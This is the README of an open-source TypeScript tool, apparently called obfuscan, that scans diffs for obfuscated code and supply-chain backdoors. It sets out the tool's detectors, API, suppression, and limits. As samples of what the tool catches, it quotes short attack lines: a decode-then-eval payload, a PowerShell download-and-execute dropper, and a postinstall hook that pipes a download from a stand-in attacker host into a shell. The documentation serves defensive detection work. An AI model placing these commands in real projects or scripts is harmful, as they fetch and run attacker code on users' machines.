Detect obfuscated code and likely backdoors in files or text. Multi-language. Embeddable. Diff-aware. Pure TypeScript.
obfuscan reads a unified diff (or an explicit file list) and returns findings that flag the two patterns nearly every supply-chain attack relies on:
- Obfuscation — code deliberately hard for a human to read: high-entropy string blobs, encoded payload arrays, bidi/homoglyph identifiers, machine-generated identifier names.
- Dynamic / install-time execution — code with the means to run attacker-controlled bytes: eval, Function, Invoke-Expression, pickle.loads, Reflection.Assembly.Load, postinstall hooks, curl … | sh, etc.
When the two combine — a decoder feeding a sink — that's the highest-precision malware shape across every language we've tested. obfuscan flags it.
$ obfuscan scan diff.patch
src/loader.ts:42:0 BLOCK [obf.decode-then-exec.typescript]
Decoded data is being executed via a dynamic sink.
> eval(Buffer.from(_0x4f3a[1], 'base64').toString())
src/loader.ts:11:0 WARN [obf.encoded-array-fingerprint]
Found 40 encoded-looking string literals (100% of literals).
package.json:23:5 BLOCK [obf.manifest-install-script]
postinstall hook fetches a URL and pipes the result to a shell.
3 findings · 2 block · 1 warn
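To make the decode-then-exec shape concrete, here is a minimal single-line sketch. It is not obfuscan's actual detector: the names SINK, DECODER, and looksLikeDecodeThenExec are hypothetical, and the sink and decoder lists are a small illustrative sample. A real detector would follow data flow across statements rather than match one line.

```typescript
// Hypothetical heuristic: a dynamic sink whose argument text contains a decoder call.
const SINK = /\b(?:eval|Function|exec)\s*\(/;
const DECODER = /\b(?:atob|Buffer\.from|b64decode|FromBase64String)\s*\(/;

function looksLikeDecodeThenExec(line: string): boolean {
  const sink = SINK.exec(line);
  if (!sink) return false;
  // Only inspect the text after the sink's opening parenthesis,
  // so a decoder that appears before the sink does not count.
  const rest = line.slice(sink.index + sink[0].length);
  return DECODER.test(rest);
}
```

Applied to the first finding above, the eval(Buffer.from(…)) line matches, while a plain Buffer.from(…) with no sink does not.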
Existing tools each cover a slice:
- Semgrep — generic AST patterns, but no entropy/data-flow and not focused on obfuscation.
- Bandit / njsscan — single-language.
- Apiiro PRevent — Python runtime, GitHub-Action-shaped, not a library.
- Datadog GuardDog — scans published packages, not PRs.
- Socket.dev / Snyk — closed-source SaaS.
The gap obfuscan fills: a TypeScript-native, embeddable, multi-language, diff-aware detector. Drop it into any Node tool — a Git client, a Husky hook, a VS Code extension, a custom GitHub Action, a CI script — and get findings on the lines that actually changed.
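For readers unfamiliar with what "diff-aware" involves, the sketch below shows one way to recover the changed lines from a unified diff. It is an illustration only, not obfuscan's parser: addedLines is a hypothetical helper, and it assumes well-formed git-style output (it would misread an added line whose content itself begins with "++ ").

```typescript
// Hypothetical helper: collect new-side line numbers of added lines, per file.
function addedLines(diff: string): Record<string, number[]> {
  const result: Record<string, number[]> = {};
  let file: string | null = null;
  let newLine = 0;
  let inHunk = false;
  for (const line of diff.split("\n")) {
    if (line.startsWith("+++ ")) {
      // "+++ b/src/x.ts" -> "src/x.ts"; "/dev/null" marks a deleted file.
      const path = line.slice(4).trim();
      file = path === "/dev/null" ? null : path.replace(/^b\//, "");
      inHunk = false;
      continue;
    }
    // Hunk header: "@@ -oldStart,oldCount +newStart,newCount @@".
    const hunk = /^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@/.exec(line);
    if (hunk) {
      newLine = Number(hunk[1]);
      inHunk = true;
      continue;
    }
    if (!inHunk || file === null) continue;
    if (line.startsWith("+")) {
      const lines = result[file] ?? [];
      lines.push(newLine);
      result[file] = lines;
      newLine++;
    } else if (line.startsWith(" ")) {
      newLine++; // context line: present on both sides
    }
    // Removed ("-") lines do not advance the new-side counter.
  }
  return result;
}
```

A host could then keep only the findings whose file and line appear in this map, which is the general idea behind reporting on changed lines only.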
npm install @obfuscan/core @obfuscan/rules
# or
pnpm add @obfuscan/core @obfuscan/rules
The core package ships the engine; rules ships language configs and tree-sitter query assets, not parser grammars. Hosts that want parser-backed custom detectors provide their own grammars via RuleSet.loadGrammar() / GrammarHandle.parse(). We use SemVer for the engine and CalVer (2026.04.0) for the rules.
@obfuscan/core loads language configs from @obfuscan/rules by default, so normal usage is just installing both packages.
import { scan } from "@obfuscan/core";
import * as fs from "node:fs/promises";
const result = await scan(
{ diff: await fs.readFile("pr.diff", "utf8") },
{ fileResolver: (p) => fs.readFile(p, "utf8") },
);
You can also load a custom rules directory:
import { loadRuleSet, scan } from "@obfuscan/core";
import * as fs from "node:fs/promises";
const rules = await loadRuleSet({
languageDir: "./my-rules/languages",
queryDir: "./my-rules/queries",
});
const result = await scan(
{ paths: ["src/file.ts"] },
{
fileResolver: (p) => fs.readFile(p, "utf8"),
rules,
},
);
Notes:
- @obfuscan/core uses SemVer. @obfuscan/rules uses CalVer (YYYY.MM.PATCH) and can update independently.
- Rule config schema: packages/rules/languages/_schema.json
import { scan } from "@obfuscan/core";
import * as fs from "node:fs/promises";
const result = await scan(
{ diff: await fs.readFile("pr.diff", "utf8") },
{ fileResolver: (path) => fs.readFile(path, "utf8") },
);
for (const f of result.findings) {
if (f.severity === "block") {
console.error(`${f.file}:${f.line} BLOCK [${f.ruleId}] ${f.reason}`);
}
}
- Decode-then-execute, the canonical malware shape:
eval(Buffer.from(_0x4f3a[1], 'base64').toString())
- String-array obfuscator output (verbatim from the 2026 axios compromise):
var _0x4f3a = ['dGVzdA==', 'aGVsbG8=', /* …128 more… */];
- PowerShell network-then-exec droppers:
IEX (New-Object Net.WebClient).DownloadString($url)
- curl | sh in install hooks:
"postinstall": "curl https://attacker.tld/x | sh"
- Trojan Source bidi attacks (any language with Unicode source).
- Pickle / Marshal / unserialize on untrusted input.
- setup.py top-level imperative code that fetches and executes at install time.
- build.rs with suspicious network behavior.
- Homoglyph identifiers (Latin/Cyrillic mixing).
The detector list is in docs/detectors.md. See docs/coverage.md for per-language coverage.
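As an illustration of the Trojan Source and homoglyph items in the list above, the following sketch checks for bidirectional control characters and for identifiers that mix Latin and Cyrillic letters. The function names are hypothetical and the character ranges are approximate; this is not the rule set obfuscan ships.

```typescript
// Unicode bidirectional embedding, override, and isolate controls
// (U+202A..U+202E, U+2066..U+2069), the characters Trojan Source relies on.
const BIDI_CONTROLS = /[\u202A-\u202E\u2066-\u2069]/;

function hasBidiControl(text: string): boolean {
  return BIDI_CONTROLS.test(text);
}

// Approximate ranges: Basic Latin letters plus Latin-1/Extended-A/B, and the Cyrillic block.
const LATIN = /[A-Za-z\u00C0-\u024F]/;
const CYRILLIC = /[\u0400-\u04FF]/;

// Flags an identifier that contains both Latin and Cyrillic characters.
function isMixedScript(identifier: string): boolean {
  return LATIN.test(identifier) && CYRILLIC.test(identifier);
}
```

For example, an identifier spelled with a Cyrillic "а" (U+0430) in place of a Latin "a" looks identical in most fonts but is flagged by isMixedScript.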
Universal detectors run on any readable text file.
Language-aware detectors are currently implemented for:
- Tier 1: JavaScript, TypeScript, Python, PowerShell, Bash, PHP, Ruby
- Tier 2: Go, Rust, C#, Java, Kotlin, Lua, Perl, VBScript
Path-based manifest detectors currently target package.json, setup.py, build.rs, GitHub Actions workflows, and Dockerfile.
See docs/coverage.md for the up-to-date matrix by rule and language.
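To show what a path-based manifest check can look like, here is a small sketch for package.json. It is an assumption-laden illustration rather than obfuscan's rule: suspiciousInstallHooks and FETCH_PIPE_SHELL are hypothetical names, the regex covers only the simplest curl/wget-to-shell pipelines, and the input is assumed to be a JSON object.

```typescript
// npm lifecycle scripts that run automatically during installation.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// A download command piped into a shell, e.g. "curl https://host/x | sh".
const FETCH_PIPE_SHELL = /\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b/;

// Returns the names of install hooks whose command fetches and pipes to a shell.
function suspiciousInstallHooks(packageJsonText: string): string[] {
  const manifest = JSON.parse(packageJsonText) as { scripts?: Record<string, unknown> };
  const scripts = manifest.scripts ?? {};
  return INSTALL_HOOKS.filter((hook) => {
    const command = scripts[hook];
    return typeof command === "string" && FETCH_PIPE_SHELL.test(command);
  });
}
```

Restricting the check to install-time hooks keeps ordinary scripts such as test or build out of scope, since those do not run automatically when a dependency is installed.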
obfuscan runs a layered pipeline over each file selected by diff or paths input:
input → file context → detectors → suppress/filter → sorted findings
- Layer A — universal, raw text. Shannon entropy on long literals, line length, bidi/homoglyph control chars, encoded-string-array regex. Fires on every language.
- Layer B — language-aware heuristics. Generic detectors routed by detected language id: dynamic execution with non-literals, decode-then-exec, network-then-exec, deserializer usage, suspicious I/O clusters, and related patterns.
- Layer C — manifest/path rules. Specialized detectors for package.json, setup.py, build.rs, .github/workflows/*, and Dockerfile.
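The Shannon entropy signal used in Layer A can be sketched as follows. The formula is the standard one, H = -Σ p(c) · log2 p(c), computed here over UTF-16 code units. The isHighEntropyLiteral helper and its thresholds (40 characters, 4.5 bits) are assumptions chosen for illustration, not obfuscan's tuned values.

```typescript
// Shannon entropy in bits per UTF-16 code unit.
function shannonEntropy(text: string): number {
  if (text.length === 0) return 0;
  const counts: Record<string, number> = {};
  for (let i = 0; i < text.length; i++) {
    const unit = text.charAt(i);
    counts[unit] = (counts[unit] ?? 0) + 1;
  }
  let entropy = 0;
  for (const unit of Object.keys(counts)) {
    const p = (counts[unit] ?? 0) / text.length;
    entropy -= p * (Math.log(p) / Math.LN2); // log base 2
  }
  return entropy;
}

// Hypothetical thresholds: long literals whose characters are close to uniformly spread.
function isHighEntropyLiteral(literal: string, minLength = 40, minBits = 4.5): boolean {
  return literal.length >= minLength && shannonEntropy(literal) >= minBits;
}
```

The length floor matters because short strings cannot reach high entropy values reliably; a string of n characters has at most log2(n) bits per character.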
Each detector emits findings with a 0–10 score and info / warn / block severity. Findings are then filtered (diff ranges, directives, allowlists), sorted, and returned in ScanResult.
Architecture details: docs/architecture.md.
False positives are inevitable in security tooling. obfuscan ships first-class suppression:
- Path allowlist for vendored / minified / generated code.
- Per-finding suppression keyed by (ruleId, sha256(snippet)), persisted by hosts in .obfuscan/allowlist.json via loadAllowlist(), saveAllowlist(), and hashSnippet().
- In-source comment suppressions: // obfuscan-disable-next-line obf.decode-then-exec
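The two suppression mechanisms above can be illustrated with a short sketch. Both functions are hypothetical stand-ins: suppressionKey shows one plausible way to build a (ruleId, sha256(snippet)) key and assumes the snippet is trimmed first, which obfuscan's own hashSnippet() may or may not do, and parseDisableDirective assumes rule ids are dot-separated words.

```typescript
import { createHash } from "node:crypto";

// Hypothetical key format: "<ruleId>:<hex sha256 of the trimmed snippet>".
function suppressionKey(ruleId: string, snippet: string): string {
  const digest = createHash("sha256").update(snippet.trim(), "utf8").digest("hex");
  return `${ruleId}:${digest}`;
}

// Returns the rule id named by a disable-next-line comment, or null if there is none.
function parseDisableDirective(line: string): string | null {
  const match = /obfuscan-disable-next-line\s+([\w-]+(?:\.[\w-]+)*)/.exec(line);
  return match ? match[1] ?? null : null;
}
```

Keying on the snippet hash rather than a line number means a suppression survives when unrelated edits shift the code, but it lapses as soon as the flagged snippet itself changes.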
- Static analysis cannot stop an attacker who designs around static analysis; the xz backdoor is the existence proof. The goal is to raise attacker cost and surface unsophisticated attempts, not to prove malice.
- Binary blobs need a separate scanner (YARA, file-magic). obfuscan flags the metadata signal but doesn't analyze byte content.
- Compiled-language and build-system backdoors still need manual review and additional build-focused rules.
- There is no built-in LLM verifier in @obfuscan/core today.
| | obfuscan | Semgrep | PRevent | GuardDog | Bandit |
|---|---|---|---|---|---|
| Embeddable as TS/JS library | ✓ | — | — | — | — |
| Diff/PR-aware | ✓ | partial | ✓ | — | — |
| Multi-language | ✓ (15+ deep, 60+ universal) | ✓ | ✓ (15) | ✓ (3) | — |
| Entropy / data-flow | ✓ | — | ✓ | ✓ | partial |
| Manifest detectors | ✓ | partial | ✓ | ✓ | — |
| Pure offline, no SaaS | ✓ | ✓ | ✓ | ✓ | ✓ |
| Open source | ✓ Apache-2.0 | LGPL/commercial | Apache-2.0 | Apache-2.0 | Apache-2.0 |
Pre-1.0. The detector framework, scoring, suppression, and tier-1/tier-2 language rules are stable. Breaking API changes are batched into minor releases until 1.0; rule changes ship as patch CalVer releases of @obfuscan/rules and never require an engine update.
- Tier-1 language rules (JS/TS, Python, PowerShell, Bash, PHP, Ruby)
- Manifest detectors for npm, PyPI, GitHub Actions, Dockerfile
- Tier-2 language rules (Go, Rust, C#, Java, Kotlin, Lua, Perl, VBScript)
- @obfuscan/cli 1.0 with SARIF output
- @obfuscan/github-action
- @obfuscan/llm-verify optional Layer-D package
- Reproducible benchmark suite against Datadog malicious-software-packages-dataset
Adding rules is the highest-leverage contribution. Most rule contributions are 3-line PRs to a JSON file. See CONTRIBUTING.md.
Bug reports, false-positive reports, and bypasses welcome — see SECURITY.md for how to report bypasses privately.
obfuscan's detection model is informed by published work from Apiiro (PRevent), Datadog (GuardDog, BewAIre), Phylum, Veracode, and the academic literature on entropy-based malware detection. The public taxonomy of PowerShell obfuscation comes from Daniel Bohannon's Invoke-Obfuscation. Where a specific paper or post directly informed a detector, it is cited inline in the source.
Apache-2.0. See LICENSE.